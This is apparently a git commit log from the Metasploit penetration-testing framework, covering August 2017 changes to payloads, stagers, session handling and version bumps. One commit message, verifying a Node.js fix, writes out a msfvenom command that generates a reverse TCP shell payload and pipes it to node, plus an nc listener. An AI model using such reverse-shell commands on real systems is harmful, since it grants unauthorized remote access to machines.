Inspired by the work in #8896
2017-08-28 11:19:17 -05:00
Brent Cook
a0e04760b5
rewrite timestomp command dispatcher to deal with file args properly
2017-08-28 08:25:42 -05:00
Marc Green
d50c7d7f5c
Output job id when jobifying exploit
2017-08-28 14:36:04 +02:00
Brent Cook
1e8edb377f
Land #8873 , cleanup enable_rdp, add error handling
2017-08-28 05:50:42 -05:00
William Vu
b797e96a19
Remove nil check because blank? handles it
...
The check used to be session_name.strip.empty?, but I forgot to remove
the nil case when I converted to blank?.
2017-08-25 14:11:59 -05:00
Metasploit
779b25bdf6
Bump version of framework to 4.16.3
2017-08-25 10:02:45 -07:00
William Webb
093bc53f97
Land #8875 , Fix UDP scanner mixin with multicast addresses
2017-08-25 02:44:29 -05:00
Adam Cammack
bd94a46c70
Land #8884 , Fix logic for on_session callbacks
2017-08-24 17:24:56 -05:00
Metasploit
2f72404b26
Bump version of framework to 4.16.2
2017-08-23 19:11:11 -07:00
Brent Cook
d3775c3919
fix logic for calling on_session callbacks
2017-08-23 18:41:50 -05:00
Jeffrey Martin
cba4d36df2
provide missing bits for R platform
2017-08-23 16:58:48 -05:00
Metasploit
7c2fa20191
Bump version of framework to 4.16.1
2017-08-23 10:36:19 -07:00
William Vu
100afaf251
Add ./ to cmd_use for paths and simplify cases
...
Don't accommodate typos.
2017-08-23 10:24:37 -05:00
Brent Cook
41eba74ddf
prefer Addrinfo over ipaddress gem
2017-08-22 23:03:45 -05:00
Brent Cook
17aef43bb8
Fix UDP scanner mixin with multicast addresses
...
This fixes #8828 by only binding UDP sockets when we have unicast
targets. If we have multicast, prefer unbound sockets.
This also brings in the 'ipaddress' gem for identifying multicast
addresses. It looks like it could replace a lot of custom-built
functionality in rex-socket, including RangeWalker. Will need to see how
efficient it is.
2017-08-22 06:44:43 -05:00
Brent Cook
29c48f9d8d
cleanup accounts post API
2017-08-21 23:00:57 -05:00
Brent Cook
e3a9ddfc22
fix retry case for acquiring security descriptor
2017-08-21 22:52:53 -05:00
Brent Cook
0d17e94f54
handle unmapped sids consistently
2017-08-21 22:36:26 -05:00
Brent Cook
c14daf3fcc
Land #8857 , Reverse and bind shells in R
2017-08-21 15:49:24 -05:00
Brent Cook
605330faf6
Land #8842 , add linux/aarch64/shell_reverse_tcp
2017-08-21 15:44:28 -05:00
William Vu
8876919f38
Fix typo s/rport/port/ in build_brute_message
...
I missed this in #7202 .
2017-08-21 12:32:41 -05:00
Brent Cook
429824b5c9
guid is hex values
2017-08-21 03:44:02 -05:00
Brent Cook
8700a36858
make session_guid default with the correct length
2017-08-21 03:24:37 -05:00
Brent Cook
f961495860
Land #8625 , Remove OpenSSL from Windows Meterp, packet header changes, and TLV packet encryption
2017-08-20 19:13:51 -05:00
Metasploit
ca7d481658
Bump version of framework to 4.16.0
2017-08-20 16:57:48 -07:00
Brent Cook
5e8c2200ac
Merge branch 'master' into land-8625-crypttlv2
2017-08-20 18:54:51 -05:00
Brent Cook
f7dc831e9a
Land #8799 , Add module to detect Docker, LXC, and systemd-nspawn containers
2017-08-20 14:45:57 -05:00
Brent Cook
6afd90b7f0
Land #8848 , fix extra sleep on linux x86 stager
2017-08-19 22:12:19 -05:00
RageLtMan
0145fc3972
payload/r.rb and UUID update
2017-08-19 06:43:28 -04:00
Metasploit
95824ce132
Bump version of framework to 4.15.8
2017-08-18 10:03:23 -07:00
h00die
dc358dd087
unknow to unknown
2017-08-18 11:33:48 -04:00
tkmru
74f89857d8
fix extra sleep on linux x86 stager
2017-08-18 15:20:35 +09:00
Tim
8b4ccc66c7
add linux/aarch64/shell_reverse_tcp
2017-08-17 18:55:37 +08:00
William Vu
5b7785438f
Add session naming support to CommandDispatcher
2017-08-16 18:18:49 -05:00
William Vu
6eae3b3d4e
Add session name output to ReadableText
2017-08-16 18:14:56 -05:00
OJ
fa292dce96
Fix issue with truncated values when unpacking packets
2017-08-16 11:01:54 +10:00
Brent Cook
70a82b5c67
Land #8834 , add resiliency to x64 linux reverse_tcp stagers
2017-08-15 08:04:32 -04:00
Brent Cook
debbc31142
use separate module names for x86 and x64 generators
2017-08-15 08:02:01 -04:00
tkmru
db2e3f2ddd
add retry to linux reverse tcp x64
2017-08-15 12:49:29 +09:00
Brent Cook
69c4ae99a7
Land #8811 , fix peer printing with bruteforce modules
2017-08-14 17:31:48 -04:00
William Vu
1a4db844c0
Refactor build_brute_message for legacy printing
2017-08-14 11:17:34 -05:00
Brent Cook
59086af261
Land #8771 , rewrite linux x64 stagers with Metasm
2017-08-14 02:32:29 -04:00
Brent Cook
0ab6dd46d3
Land #8762 , add initial Rex FTP protocol implementation
2017-08-14 01:59:53 -04:00
Brent Cook
26193216d1
Land #8686 , add 'download' and simplified URI request methods to http client mixin
...
Updated PDF author metadata downloader to support the new methods.
2017-08-14 01:40:17 -04:00
Brent Cook
5d05ca154a
added http client 'download' method and updates to pdf author module from @bcoles
2017-08-14 01:08:53 -04:00
Patrick Thomas
437fe4b63a
handle missing util.pump in nodejs shell payloads
...
Modern NodeJS (since 5.3.0) has removed util.pump in favor of stream.pipe.
On current versions the nodejs tcp shell payloads error out:
```
$ node --version
v7.10.0
$ msfvenom -p nodejs/shell_reverse_tcp LHOST=127.0.0.1 LPORT=7777 | node
<snip>
TypeError: util.pump is not a function
at Socket.<anonymous> ([stdin]:1:405)
at Object.onceWrapper (events.js:293:19)
at emitNone (events.js:86:13)
at Socket.emit (events.js:188:7)
at TCPConnectWrap.afterConnect [as oncomplete] (net.js:1080:10)
```
With this change, bind and reverse tcp should be tolerant of both new and older versions.
*Reference*
https://github.com/nodejs/node/pull/2531
*Verification steps*
1. Set up a handler (either exploit/multi/handler or simple nc)
```
$ nc -l -v 7777
```
2. Use patched version with various versions of node:
```
msfvenom -p nodejs/shell_reverse_tcp LHOST=127.0.0.1 LPORT=7777 | node
```
3. Confirm both old and new versions of node result in shell, not error.
2017-08-12 20:40:03 -07:00
Metasploit
be926e1d75
Bump version of framework to 4.15.7
2017-08-11 10:12:37 -07:00